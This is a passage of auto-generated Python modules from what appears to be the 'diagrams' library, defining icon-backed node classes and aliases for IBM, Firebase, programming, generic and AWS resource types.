TmsDataInterface(_Data): _icon = "tms-data-interface.png" # Aliases File: diagrams/ibm/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _IBM class _General(_IBM): _type = "general" _icon_dir = "resources/ibm/general" class CloudMessaging(_General): _icon = "cloud-messaging.png" class CloudServices(_General): _icon = "cloud-services.png" class Cloudant(_General): _icon = "cloudant.png" class CognitiveServices(_General): _icon = "cognitive-services.png" class DataSecurity(_General): _icon = "data-security.png" class Enterprise(_General): _icon = "enterprise.png" class GovernanceRiskCompliance(_General): _icon = "governance-risk-compliance.png" class IBMContainers(_General): _icon = "ibm-containers.png" class IBMPublicCloud(_General): _icon = "ibm-public-cloud.png" class IdentityAccessManagement(_General): _icon = "identity-access-management.png" class IdentityProvider(_General): _icon = "identity-provider.png" class InfrastructureSecurity(_General): _icon = "infrastructure-security.png" class Internet(_General): _icon = "internet.png" class IotCloud(_General): _icon = "iot-cloud.png" class MicroservicesApplication(_General): _icon = "microservices-application.png" class MicroservicesMesh(_General): _icon = "microservices-mesh.png" class MonitoringLogging(_General): _icon = "monitoring-logging.png" class Monitoring(_General): _icon = "monitoring.png" class ObjectStorage(_General): _icon = "object-storage.png" class OfflineCapabilities(_General): _icon = "offline-capabilities.png" class Openwhisk(_General): _icon = "openwhisk.png" class PeerCloud(_General): _icon = "peer-cloud.png" class RetrieveRank(_General): _icon = "retrieve-rank.png" class Scalable(_General): _icon = "scalable.png" class ServiceDiscoveryConfiguration(_General): _icon = "service-discovery-configuration.png" class TextToSpeech(_General): _icon = "text-to-speech.png" class TransformationConnectivity(_General): _icon = "transformation-connectivity.png" # Aliases File: diagrams/ibm/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Compute(_IBM): _type = "compute" _icon_dir = "resources/ibm/compute" class BareMetalServer(_Compute): _icon = "bare-metal-server.png" class ImageService(_Compute): _icon = "image-service.png" class Instance(_Compute): _icon = "instance.png" class Key(_Compute): _icon = "key.png" class PowerInstance(_Compute): _icon = "power-instance.png" # Aliases File: diagrams/firebase/extentions.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Extentions(_Firebase): _type = "extentions" _icon_dir = "resources/firebase/extentions" class Extensions(_Extentions): _icon = "extensions.png" # Aliases File: diagrams/firebase/grow.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Grow(_Firebase): _type = "grow" _icon_dir = "resources/firebase/grow" class ABTesting(_Grow): _icon = "ab-testing.png" class AppIndexing(_Grow): _icon = "app-indexing.png" class DynamicLinks(_Grow): _icon = "dynamic-links.png" class InAppMessaging(_Grow): _icon = "in-app-messaging.png" class Invites(_Grow): _icon = "invites.png" class Messaging(_Grow): _icon = "messaging.png" class Predictions(_Grow): _icon = "predictions.png" class RemoteConfig(_Grow): _icon = "remote-config.png" # Aliases FCM = Messaging File: diagrams/firebase/__init__.py """ Firebase provides a set of services for Firebase provider. 
""" from diagrams import Node class _Firebase(Node): _provider = "firebase" _icon_dir = "resources/firebase" fontcolor = "#ffffff" File: diagrams/firebase/develop.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Develop(_Firebase): _type = "develop" _icon_dir = "resources/firebase/develop" class Authentication(_Develop): _icon = "authentication.png" class Firestore(_Develop): _icon = "firestore.png" class Functions(_Develop): _icon = "functions.png" class Hosting(_Develop): _icon = "hosting.png" class MLKit(_Develop): _icon = "ml-kit.png" class RealtimeDatabase(_Develop): _icon = "realtime-database.png" class Storage(_Develop): _icon = "storage.png" # Aliases File: diagrams/firebase/quality.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Quality(_Firebase): _type = "quality" _icon_dir = "resources/firebase/quality" class AppDistribution(_Quality): _icon = "app-distribution.png" class CrashReporting(_Quality): _icon = "crash-reporting.png" class Crashlytics(_Quality): _icon = "crashlytics.png" class PerformanceMonitoring(_Quality): _icon = "performance-monitoring.png" class TestLab(_Quality): _icon = "test-lab.png" # Aliases File: diagrams/firebase/base.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Base(_Firebase): _type = "base" _icon_dir = "resources/firebase/base" class Firebase(_Base): _icon = "firebase.png" # Aliases File: diagrams/programming/framework.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Framework(_Programming): _type = "framework" _icon_dir = "resources/programming/framework" class Angular(_Framework): _icon = "angular.png" class Backbone(_Framework): _icon = "backbone.png" class Django(_Framework): _icon = "django.png" class Ember(_Framework): _icon = "ember.png" class Fastapi(_Framework): _icon = "fastapi.png" class Flask(_Framework): _icon = "flask.png" class Flutter(_Framework): _icon = "flutter.png" class Graphql(_Framework): _icon = "graphql.png" class Laravel(_Framework): _icon = "laravel.png" class Micronaut(_Framework): _icon = "micronaut.png" class Quarkus(_Framework): _icon = "quarkus.png" class Rails(_Framework): _icon = "rails.png" class React(_Framework): _icon = "react.png" class Spring(_Framework): _icon = "spring.png" class Starlette(_Framework): _icon = "starlette.png" class Svelte(_Framework): _icon = "svelte.png" class Vue(_Framework): _icon = "vue.png" # Aliases FastAPI = Fastapi GraphQL = Graphql File: diagrams/programming/__init__.py """ Programming provides a set of programming languages and frameworks. """ from diagrams import Node class _Programming(Node): _provider = "programming" _icon_dir = "resources/programming" fontcolor = "#ffffff" File: diagrams/programming/flowchart.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Programming class _Flowchart(_Programming): _type = "flowchart" _icon_dir = "resources/programming/flowchart" class Action(_Flowchart): _icon = "action.png" class Collate(_Flowchart): _icon = "collate.png" class Database(_Flowchart): _icon = "database.png" class Decision(_Flowchart): _icon = "decision.png" class Delay(_Flowchart): _icon = "delay.png" class Display(_Flowchart): _icon = "display.png" class Document(_Flowchart): _icon = "document.png" class InputOutput(_Flowchart): _icon = "input-output.png" class Inspection(_Flowchart): _icon = "inspection.png" class InternalStorage(_Flowchart): _icon = "internal-storage.png" class LoopLimit(_Flowchart): _icon = "loop-limit.png" class ManualInput(_Flowchart): _icon = "manual-input.png" class ManualLoop(_Flowchart): _icon = "manual-loop.png" class Merge(_Flowchart): _icon = "merge.png" class MultipleDocuments(_Flowchart): _icon = "multiple-documents.png" class OffPageConnectorLeft(_Flowchart): _icon = "off-page-connector-left.png" class OffPageConnectorRight(_Flowchart): _icon = "off-page-connector-right.png" class Or(_Flowchart): _icon = "or.png" class PredefinedProcess(_Flowchart): _icon = "predefined-process.png" class Preparation(_Flowchart): _icon = "preparation.png" class Sort(_Flowchart): _icon = "sort.png" class StartEnd(_Flowchart): _icon = "start-end.png" class StoredData(_Flowchart): _icon = "stored-data.png" class SummingJunction(_Flowchart): _icon = "summing-junction.png" # Aliases File: diagrams/programming/runtime.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Runtime(_Programming): _type = "runtime" _icon_dir = "resources/programming/runtime" class Dapr(_Runtime): _icon = "dapr.png" # Aliases File: diagrams/programming/language.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Language(_Programming): _type = "language" _icon_dir = "resources/programming/language" class Bash(_Language): _icon = "bash.png" class C(_Language): _icon = "c.png" class Cpp(_Language): _icon = "cpp.png" class Csharp(_Language): _icon = "csharp.png" class Dart(_Language): _icon = "dart.png" class Elixir(_Language): _icon = "elixir.png" class Erlang(_Language): _icon = "erlang.png" class Go(_Language): _icon = "go.png" class Java(_Language): _icon = "java.png" class Javascript(_Language): _icon = "javascript.png" class Kotlin(_Language): _icon = "kotlin.png" class Latex(_Language): _icon = "latex.png" class Matlab(_Language): _icon = "matlab.png" class Nodejs(_Language): _icon = "nodejs.png" class Php(_Language): _icon = "php.png" class Python(_Language): _icon = "python.png" class R(_Language): _icon = "r.png" class Ruby(_Language): _icon = "ruby.png" class Rust(_Language): _icon = "rust.png" class Scala(_Language): _icon = "scala.png" class Swift(_Language): _icon = "swift.png" class Typescript(_Language): _icon = "typescript.png" # Aliases JavaScript = Javascript NodeJS = Nodejs PHP = Php TypeScript = Typescript File: diagrams/generic/place.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Place(_Generic): _type = "place" _icon_dir = "resources/generic/place" class Datacenter(_Place): _icon = "datacenter.png" # Aliases File: diagrams/generic/device.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Generic

class _Device(_Generic):
    _type = "device"
    _icon_dir = "resources/generic/device"

class Mobile(_Device):
    _icon = "mobile.png"

class Tablet(_Device):
    _icon = "tablet.png"

# Aliases

File: diagrams/generic/database.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _Generic

class _Database(_Generic):
    _type = "database"
    _icon_dir = "resources/generic/database"

class SQL(_Database):
    _icon = "sql.png"

# Aliases

File: diagrams/generic/os.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _Generic

class _Os(_Generic):
    _type = "os"
    _icon_dir = "resources/generic/os"

class Android(_Os):
    _icon = "android.png"

class Centos(_Os):
    _icon = "centos.png"

class Debian(_Os):
    _icon = "debian.png"

class IOS(_Os):
    _icon = "ios.png"

class LinuxGeneral(_Os):
    _icon = "linux-general.png"

class Raspbian(_Os):
    _icon = "raspbian.png"

class RedHat(_Os):
    _icon = "red-hat.png"

class Suse(_Os):
    _icon = "suse.png"

class Ubuntu(_Os):
    _icon = "ubuntu.png"

class Windows(_Os):
    _icon = "windows.png"

# Aliases

File: diagrams/generic/virtualization.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _Generic

class _Virtualization(_Generic):
    _type = "virtualization"
    _icon_dir = "resources/generic/virtualization"

class Qemu(_Virtualization):
    _icon = "qemu.png"

class Virtualbox(_Virtualization):
    _icon = "virtualbox.png"

class Vmware(_Virtualization):
    _icon = "vmware.png"

class XEN(_Virtualization):
    _icon = "xen.png"

# Aliases

File: diagrams/generic/__init__.py

"""
Generic provides the possibility of loading an image to be presented as a node.
"""

from diagrams import Node

class _Generic(Node):
    _provider = "generic"
    _icon_dir = "resources/generic"
    fontcolor = "#ffffff"

File: diagrams/generic/storage.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _Generic

class _Storage(_Generic):
    _type = "storage"
    _icon_dir = "resources/generic/storage"

class Storage(_Storage):
    _icon = "storage.png"

# Aliases

File: diagrams/generic/network.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _Generic

class _Network(_Generic):
    _type = "network"
    _icon_dir = "resources/generic/network"

class Firewall(_Network):
    _icon = "firewall.png"

class Router(_Network):
    _icon = "router.png"

class Subnet(_Network):
    _icon = "subnet.png"

class Switch(_Network):
    _icon = "switch.png"

class VPN(_Network):
    _icon = "vpn.png"

# Aliases

File: diagrams/generic/blank.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _Generic

class _Blank(_Generic):
    _type = "blank"
    _icon_dir = "resources/generic/blank"

class Blank(_Blank):
    _icon = "blank.png"

# Aliases

File: diagrams/generic/compute.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _Generic

class _Compute(_Generic):
    _type = "compute"
    _icon_dir = "resources/generic/compute"

class Rack(_Compute):
    _icon = "rack.png"

# Aliases
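The classes above are thin wrappers around diagrams.Node: each one only binds an icon path. A minimal usage sketch follows; it is not part of the repository sources and assumes the Diagram context manager exported by the top-level diagrams package (this excerpt only shows the package exporting Node). Labels and the diagram name are illustrative.

from diagrams import Diagram
from diagrams.generic.compute import Rack
from diagrams.generic.database import SQL
from diagrams.generic.network import Router, Switch

# Chain nodes with >>; show=False renders the image without opening it.
with Diagram("Generic topology", show=False):
    Router("edge") >> Switch("lan") >> Rack("app server") >> SQL("db")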
File: diagrams/aws/enablement.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _AWS

class _Enablement(_AWS):
    _type = "enablement"
    _icon_dir = "resources/aws/enablement"

class CustomerEnablement(_Enablement):
    _icon = "customer-enablement.png"

class Iq(_Enablement):
    _icon = "iq.png"

class ManagedServices(_Enablement):
    _icon = "managed-services.png"

class ProfessionalServices(_Enablement):
    _icon = "professional-services.png"

class Support(_Enablement):
    _icon = "support.png"

# Aliases

File: diagrams/aws/media.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _AWS

class _Media(_AWS):
    _type = "media"
    _icon_dir = "resources/aws/media"

class ElasticTranscoder(_Media):
    _icon = "elastic-transcoder.png"

class ElementalConductor(_Media):
    _icon = "elemental-conductor.png"

class ElementalDelta(_Media):
    _icon = "elemental-delta.png"

class ElementalLive(_Media):
    _icon = "elemental-live.png"

class ElementalMediaconnect(_Media):
    _icon = "elemental-mediaconnect.png"

class ElementalMediaconvert(_Media):
    _icon = "elemental-mediaconvert.png"

class ElementalMedialive(_Media):
    _icon = "elemental-medialive.png"

class ElementalMediapackage(_Media):
    _icon = "elemental-mediapackage.png"

class ElementalMediastore(_Media):
    _icon = "elemental-mediastore.png"

class ElementalMediatailor(_Media):
    _icon = "elemental-mediatailor.png"

class ElementalServer(_Media):
    _icon = "elemental-server.png"

class KinesisVideoStreams(_Media):
    _icon = "kinesis-video-streams.png"

class MediaServices(_Media):
    _icon = "media-services.png"

# Aliases

File: diagrams/aws/enduser.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _AWS

class _Enduser(_AWS):
    _type = "enduser"
    _icon_dir = "resources/aws/enduser"

class Appstream20(_Enduser):
    _icon = "appstream-2-0.png"

class DesktopAndAppStreaming(_Enduser):
    _icon = "desktop-and-app-streaming.png"

class Workdocs(_Enduser):
    _icon = "workdocs.png"

class Worklink(_Enduser):
    _icon = "worklink.png"

class Workspaces(_Enduser):
    _icon = "workspaces.png"

# Aliases

File: diagrams/aws/game.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _AWS

class _Game(_AWS):
    _type = "game"
    _icon_dir = "resources/aws/game"

class GameTech(_Game):
    _icon = "game-tech.png"

class Gamelift(_Game):
    _icon = "gamelift.png"

# Aliases

File: diagrams/aws/database.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from .
import _AWS class _Database(_AWS): _type = "database" _icon_dir = "resources/aws/database" class AuroraInstance(_Database): _icon = "aurora-instance.png" class Aurora(_Database): _icon = "aurora.png" class DatabaseMigrationServiceDatabaseMigrationWorkflow(_Database): _icon = "database-migration-service-database-migration-workflow.png" class DatabaseMigrationService(_Database): _icon = "database-migration-service.png" class Database(_Database): _icon = "database.png" class DocumentdbMongodbCompatibility(_Database): _icon = "documentdb-mongodb-compatibility.png" class DynamodbAttribute(_Database): _icon = "dynamodb-attribute.png" class DynamodbAttributes(_Database): _icon = "dynamodb-attributes.png" class DynamodbDax(_Database): _icon = "dynamodb-dax.png" class DynamodbGlobalSecondaryIndex(_Database): _icon = "dynamodb-global-secondary-index.png" class DynamodbItem(_Database): _icon = "dynamodb-item.png" class DynamodbItems(_Database): _icon = "dynamodb-items.png" class DynamodbTable(_Database): _icon = "dynamodb-table.png" class Dynamodb(_Database): _icon = "dynamodb.png" class ElasticacheCacheNode(_Database): _icon = "elasticache-cache-node.png" class ElasticacheForMemcached(_Database): _icon = "elasticache-for-memcached.png" class ElasticacheForRedis(_Database): _icon = "elasticache-for-redis.png" class Elasticache(_Database): _icon = "elasticache.png" class KeyspacesManagedApacheCassandraService(_Database): _icon = "keyspaces-managed-apache-cassandra-service.png" class Neptune(_Database): _icon = "neptune.png" class QuantumLedgerDatabaseQldb(_Database): _icon = "quantum-ledger-database-qldb.png" class RDSInstance(_Database): _icon = "rds-instance.png" class RDSMariadbInstance(_Database): _icon = "rds-mariadb-instance.png" class RDSMysqlInstance(_Database): _icon = "rds-mysql-instance.png" class RDSOnVmware(_Database): _icon = "rds-on-vmware.png" class RDSOracleInstance(_Database): _icon = "rds-oracle-instance.png" class RDSPostgresqlInstance(_Database): _icon = "rds-postgresql-instance.png" class RDSSqlServerInstance(_Database): _icon = "rds-sql-server-instance.png" class RDS(_Database): _icon = "rds.png" class RedshiftDenseComputeNode(_Database): _icon = "redshift-dense-compute-node.png" class RedshiftDenseStorageNode(_Database): _icon = "redshift-dense-storage-node.png" class Redshift(_Database): _icon = "redshift.png" class Timestream(_Database): _icon = "timestream.png" # Aliases DMS = DatabaseMigrationService DocumentDB = DocumentdbMongodbCompatibility DAX = DynamodbDax DynamodbGSI = DynamodbGlobalSecondaryIndex DB = Database DDB = Dynamodb ElastiCache = Elasticache QLDB = QuantumLedgerDatabaseQldb File: diagrams/aws/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AWS class _Security(_AWS): _type = "security" _icon_dir = "resources/aws/security" class AdConnector(_Security): _icon = "ad-connector.png" class Artifact(_Security): _icon = "artifact.png" class CertificateAuthority(_Security): _icon = "certificate-authority.png" class CertificateManager(_Security): _icon = "certificate-manager.png" class CloudDirectory(_Security): _icon = "cloud-directory.png" class Cloudhsm(_Security): _icon = "cloudhsm.png" class Cognito(_Security): _icon = "cognito.png" class Detective(_Security): _icon = "detective.png" class DirectoryService(_Security): _icon = "directory-service.png" class FirewallManager(_Security): _icon = "firewall-manager.png" class Guardduty(_Security): _icon = "guardduty.png" class IdentityAndAccessManagementIamAccessAnalyzer(_Security): _icon = "identity-and-access-management-iam-access-analyzer.png" class IdentityAndAccessManagementIamAddOn(_Security): _icon = "identity-and-access-management-iam-add-on.png" class IdentityAndAccessManagementIamAWSStsAlternate(_Security): _icon = "identity-and-access-management-iam-aws-sts-alternate.png" class IdentityAndAccessManagementIamAWSSts(_Security): _icon = "identity-and-access-management-iam-aws-sts.png" class IdentityAndAccessManagementIamDataEncryptionKey(_Security): _icon = "identity-and-access-management-iam-data-encryption-key.png" class IdentityAndAccessManagementIamEncryptedData(_Security): _icon = "identity-and-access-management-iam-encrypted-data.png" class IdentityAndAccessManagementIamLongTermSecurityCredential(_Security): _icon = "identity-and-access-management-iam-long-term-security-credential.png" class IdentityAndAccessManagementIamMfaToken(_Security): _icon = "identity-and-access-management-iam-mfa-token.png" class IdentityAndAccessManagementIamPermissions(_Security): _icon = "identity-and-access-management-iam-permissions.png" class IdentityAndAccessManagementIamRole(_Security): _icon = "identity-and-access-management-iam-role.png" class IdentityAndAccessManagementIamTemporarySecurityCredential(_Security): _icon = "identity-and-access-management-iam-temporary-security-credential.png" class IdentityAndAccessManagementIam(_Security): _icon = "identity-and-access-management-iam.png" class InspectorAgent(_Security): _icon = "inspector-agent.png" class Inspector(_Security): _icon = "inspector.png" class KeyManagementService(_Security): _icon = "key-management-service.png" class Macie(_Security): _icon = "macie.png" class ManagedMicrosoftAd(_Security): _icon = "managed-microsoft-ad.png" class ResourceAccessManager(_Security): _icon = "resource-access-manager.png" class SecretsManager(_Security): _icon = "secrets-manager.png" class SecurityHubFinding(_Security): _icon = "security-hub-finding.png" class SecurityHub(_Security): _icon = "security-hub.png" class SecurityIdentityAndCompliance(_Security): _icon = "security-identity-and-compliance.png" class ShieldAdvanced(_Security): _icon = "shield-advanced.png" class Shield(_Security): _icon = "shield.png" class SimpleAd(_Security): _icon = "simple-ad.png" class SingleSignOn(_Security): _icon = "single-sign-on.png" class WAFFilteringRule(_Security): _icon = "waf-filtering-rule.png" class WAF(_Security): _icon = "waf.png" # Aliases ACM = CertificateManager CloudHSM = Cloudhsm DS = DirectoryService FMS = FirewallManager IAMAccessAnalyzer = IdentityAndAccessManagementIamAccessAnalyzer IAMAWSSts = IdentityAndAccessManagementIamAWSSts IAMPermissions = IdentityAndAccessManagementIamPermissions IAMRole = IdentityAndAccessManagementIamRole IAM 
= IdentityAndAccessManagementIam
KMS = KeyManagementService
RAM = ResourceAccessManager

File: diagrams/aws/satellite.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _AWS

class _Satellite(_AWS):
    _type = "satellite"
    _icon_dir = "resources/aws/satellite"

class GroundStation(_Satellite):
    _icon = "ground-station.png"

class Satellite(_Satellite):
    _icon = "satellite.png"

# Aliases

File: diagrams/aws/mobile.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _AWS

class _Mobile(_AWS):
    _type = "mobile"
    _icon_dir = "resources/aws/mobile"

class Amplify(_Mobile):
    _icon = "amplify.png"

class APIGatewayEndpoint(_Mobile):
    _icon = "api-gateway-endpoint.png"

class APIGateway(_Mobile):
    _icon = "api-gateway.png"

class Appsync(_Mobile):
    _icon = "appsync.png"

class DeviceFarm(_Mobile):
    _icon = "device-farm.png"

class Mobile(_Mobile):
    _icon = "mobile.png"

class Pinpoint(_Mobile):
    _icon = "pinpoint.png"

# Aliases

File: diagrams/aws/robotics.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _AWS

class _Robotics(_AWS):
    _type = "robotics"
    _icon_dir = "resources/aws/robotics"

class RobomakerCloudExtensionRos(_Robotics):
    _icon = "robomaker-cloud-extension-ros.png"

class RobomakerDevelopmentEnvironment(_Robotics):
    _icon = "robomaker-development-environment.png"

class RobomakerFleetManagement(_Robotics):
    _icon = "robomaker-fleet-management.png"

class RobomakerSimulator(_Robotics):
    _icon = "robomaker-simulator.png"

class Robomaker(_Robotics):
    _icon = "robomaker.png"

class Robotics(_Robotics):
    _icon = "robotics.png"

# Aliases

File: diagrams/aws/__init__.py

"""
AWS provides a set of services for Amazon Web Service provider.
"""

from diagrams import Node

class _AWS(Node):
    _provider = "aws"
    _icon_dir = "resources/aws"
    fontcolor = "#ffffff"
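Every node class in the aws package derives from _AWS above and therefore from diagrams.Node. As a hedged sketch (not part of the repository sources; it assumes the Diagram and Cluster helpers exported by the top-level diagrams package, which this excerpt only shows exporting Node), classes defined elsewhere in this dump such as ELB, EC2, and RDS compose as shown below; labels and the diagram name are illustrative.

from diagrams import Cluster, Diagram
from diagrams.aws.compute import EC2
from diagrams.aws.database import RDS
from diagrams.aws.network import ELB

# Three EC2 workers behind a load balancer, all writing to one RDS instance.
with Diagram("AWS web service", show=False):
    lb = ELB("lb")
    db = RDS("events")
    with Cluster("workers"):
        for i in range(3):
            lb >> EC2("worker-%d" % i) >> db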
File: diagrams/aws/integration.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _AWS

class _Integration(_AWS):
    _type = "integration"
    _icon_dir = "resources/aws/integration"

class ApplicationIntegration(_Integration):
    _icon = "application-integration.png"

class Appsync(_Integration):
    _icon = "appsync.png"

class ConsoleMobileApplication(_Integration):
    _icon = "console-mobile-application.png"

class EventResource(_Integration):
    _icon = "event-resource.png"

class EventbridgeCustomEventBusResource(_Integration):
    _icon = "eventbridge-custom-event-bus-resource.png"

class EventbridgeDefaultEventBusResource(_Integration):
    _icon = "eventbridge-default-event-bus-resource.png"

class EventbridgeSaasPartnerEventBusResource(_Integration):
    _icon = "eventbridge-saas-partner-event-bus-resource.png"

class Eventbridge(_Integration):
    _icon = "eventbridge.png"

class ExpressWorkflows(_Integration):
    _icon = "express-workflows.png"

class MQ(_Integration):
    _icon = "mq.png"

class SimpleNotificationServiceSnsEmailNotification(_Integration):
    _icon = "simple-notification-service-sns-email-notification.png"

class SimpleNotificationServiceSnsHttpNotification(_Integration):
    _icon = "simple-notification-service-sns-http-notification.png"

class SimpleNotificationServiceSnsTopic(_Integration):
    _icon = "simple-notification-service-sns-topic.png"

class SimpleNotificationServiceSns(_Integration):
    _icon = "simple-notification-service-sns.png"

class SimpleQueueServiceSqsMessage(_Integration):
    _icon = "simple-queue-service-sqs-message.png"

class SimpleQueueServiceSqsQueue(_Integration):
    _icon = "simple-queue-service-sqs-queue.png"

class SimpleQueueServiceSqs(_Integration):
    _icon = "simple-queue-service-sqs.png"

class StepFunctions(_Integration):
    _icon = "step-functions.png"

# Aliases
SNS = SimpleNotificationServiceSns
SQS = SimpleQueueServiceSqs
SF = StepFunctions

File: diagrams/aws/ml.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from .
import _AWS class _ML(_AWS): _type = "ml" _icon_dir = "resources/aws/ml" class ApacheMxnetOnAWS(_ML): _icon = "apache-mxnet-on-aws.png" class AugmentedAi(_ML): _icon = "augmented-ai.png" class Comprehend(_ML): _icon = "comprehend.png" class DeepLearningAmis(_ML): _icon = "deep-learning-amis.png" class DeepLearningContainers(_ML): _icon = "deep-learning-containers.png" class Deepcomposer(_ML): _icon = "deepcomposer.png" class Deeplens(_ML): _icon = "deeplens.png" class Deepracer(_ML): _icon = "deepracer.png" class ElasticInference(_ML): _icon = "elastic-inference.png" class Forecast(_ML): _icon = "forecast.png" class FraudDetector(_ML): _icon = "fraud-detector.png" class Kendra(_ML): _icon = "kendra.png" class Lex(_ML): _icon = "lex.png" class MachineLearning(_ML): _icon = "machine-learning.png" class Personalize(_ML): _icon = "personalize.png" class Polly(_ML): _icon = "polly.png" class RekognitionImage(_ML): _icon = "rekognition-image.png" class RekognitionVideo(_ML): _icon = "rekognition-video.png" class Rekognition(_ML): _icon = "rekognition.png" class SagemakerGroundTruth(_ML): _icon = "sagemaker-ground-truth.png" class SagemakerModel(_ML): _icon = "sagemaker-model.png" class SagemakerNotebook(_ML): _icon = "sagemaker-notebook.png" class SagemakerTrainingJob(_ML): _icon = "sagemaker-training-job.png" class Sagemaker(_ML): _icon = "sagemaker.png" class TensorflowOnAWS(_ML): _icon = "tensorflow-on-aws.png" class Textract(_ML): _icon = "textract.png" class Transcribe(_ML): _icon = "transcribe.png" class Translate(_ML): _icon = "translate.png" # Aliases DLC = DeepLearningContainers File: diagrams/aws/devtools.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Devtools(_AWS): _type = "devtools" _icon_dir = "resources/aws/devtools" class CloudDevelopmentKit(_Devtools): _icon = "cloud-development-kit.png" class Cloud9Resource(_Devtools): _icon = "cloud9-resource.png" class Cloud9(_Devtools): _icon = "cloud9.png" class Codebuild(_Devtools): _icon = "codebuild.png" class Codecommit(_Devtools): _icon = "codecommit.png" class Codedeploy(_Devtools): _icon = "codedeploy.png" class Codepipeline(_Devtools): _icon = "codepipeline.png" class Codestar(_Devtools): _icon = "codestar.png" class CommandLineInterface(_Devtools): _icon = "command-line-interface.png" class DeveloperTools(_Devtools): _icon = "developer-tools.png" class ToolsAndSdks(_Devtools): _icon = "tools-and-sdks.png" class XRay(_Devtools): _icon = "x-ray.png" # Aliases CLI = CommandLineInterface DevTools = DeveloperTools File: diagrams/aws/business.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Business(_AWS): _type = "business" _icon_dir = "resources/aws/business" class AlexaForBusiness(_Business): _icon = "alexa-for-business.png" class BusinessApplications(_Business): _icon = "business-applications.png" class Chime(_Business): _icon = "chime.png" class Workmail(_Business): _icon = "workmail.png" # Aliases A4B = AlexaForBusiness File: diagrams/aws/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AWS class _Storage(_AWS): _type = "storage" _icon_dir = "resources/aws/storage" class Backup(_Storage): _icon = "backup.png" class CloudendureDisasterRecovery(_Storage): _icon = "cloudendure-disaster-recovery.png" class EFSInfrequentaccessPrimaryBg(_Storage): _icon = "efs-infrequentaccess-primary-bg.png" class EFSStandardPrimaryBg(_Storage): _icon = "efs-standard-primary-bg.png" class ElasticBlockStoreEBSSnapshot(_Storage): _icon = "elastic-block-store-ebs-snapshot.png" class ElasticBlockStoreEBSVolume(_Storage): _icon = "elastic-block-store-ebs-volume.png" class ElasticBlockStoreEBS(_Storage): _icon = "elastic-block-store-ebs.png" class ElasticFileSystemEFSFileSystem(_Storage): _icon = "elastic-file-system-efs-file-system.png" class ElasticFileSystemEFS(_Storage): _icon = "elastic-file-system-efs.png" class FsxForLustre(_Storage): _icon = "fsx-for-lustre.png" class FsxForWindowsFileServer(_Storage): _icon = "fsx-for-windows-file-server.png" class Fsx(_Storage): _icon = "fsx.png" class MultipleVolumesResource(_Storage): _icon = "multiple-volumes-resource.png" class S3GlacierArchive(_Storage): _icon = "s3-glacier-archive.png" class S3GlacierVault(_Storage): _icon = "s3-glacier-vault.png" class S3Glacier(_Storage): _icon = "s3-glacier.png" class SimpleStorageServiceS3BucketWithObjects(_Storage): _icon = "simple-storage-service-s3-bucket-with-objects.png" class SimpleStorageServiceS3Bucket(_Storage): _icon = "simple-storage-service-s3-bucket.png" class SimpleStorageServiceS3Object(_Storage): _icon = "simple-storage-service-s3-object.png" class SimpleStorageServiceS3(_Storage): _icon = "simple-storage-service-s3.png" class SnowFamilySnowballImportExport(_Storage): _icon = "snow-family-snowball-import-export.png" class SnowballEdge(_Storage): _icon = "snowball-edge.png" class Snowball(_Storage): _icon = "snowball.png" class Snowmobile(_Storage): _icon = "snowmobile.png" class StorageGatewayCachedVolume(_Storage): _icon = "storage-gateway-cached-volume.png" class StorageGatewayNonCachedVolume(_Storage): _icon = "storage-gateway-non-cached-volume.png" class StorageGatewayVirtualTapeLibrary(_Storage): _icon = "storage-gateway-virtual-tape-library.png" class StorageGateway(_Storage): _icon = "storage-gateway.png" class Storage(_Storage): _icon = "storage.png" # Aliases CDR = CloudendureDisasterRecovery EBS = ElasticBlockStoreEBS EFS = ElasticFileSystemEFS FSx = Fsx S3 = SimpleStorageServiceS3 File: diagrams/aws/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
